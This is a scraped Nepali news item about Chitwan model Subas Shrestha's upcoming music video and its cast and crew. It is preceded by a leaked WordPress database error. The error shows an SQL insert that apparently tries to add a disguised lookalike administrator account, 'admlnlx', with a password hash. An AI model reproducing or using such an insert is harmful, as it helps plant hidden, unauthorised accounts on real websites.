WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhrMCjt4yiqV1xY8lUPpTbAE5JC7hR/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-17 23:44:46', '', 'admlnlx', 'admlnlx')
चितवन, माघ २७–
काठमाडौंमा मोडलिङ क्षेत्रमा जम्दै गरेका चितवनका सुवास श्रेष्ठको नयाँ म्यूजिक भिडियो बजारमा आउने भएको छ । केहीदिन अघि मात्रै छायाँकन सकिएको ‘रायन रायन..’बोलको गीतको भिडियोमा सुवास देखिने छन् ।
सो गीतको भिडियोमा सुवासका साथै लुट–२ चलचित्रको ‘ठमेल बजार’ गीतबाट चर्चामा आएकी मोडेल एलिशा राई, सुरेन बसेल र प्रकाश बस्नेत देखिने छन् । गीतको भिडियोलाई गम्भिर विष्टले निर्देशन गरेका छन् । निता थापा मगरको स्वर रहेको सो गीतमा बलराम राजवंशीको संगीत भरेका छन् भने दिनेश सुवेदीको शब्द रहेको छ ।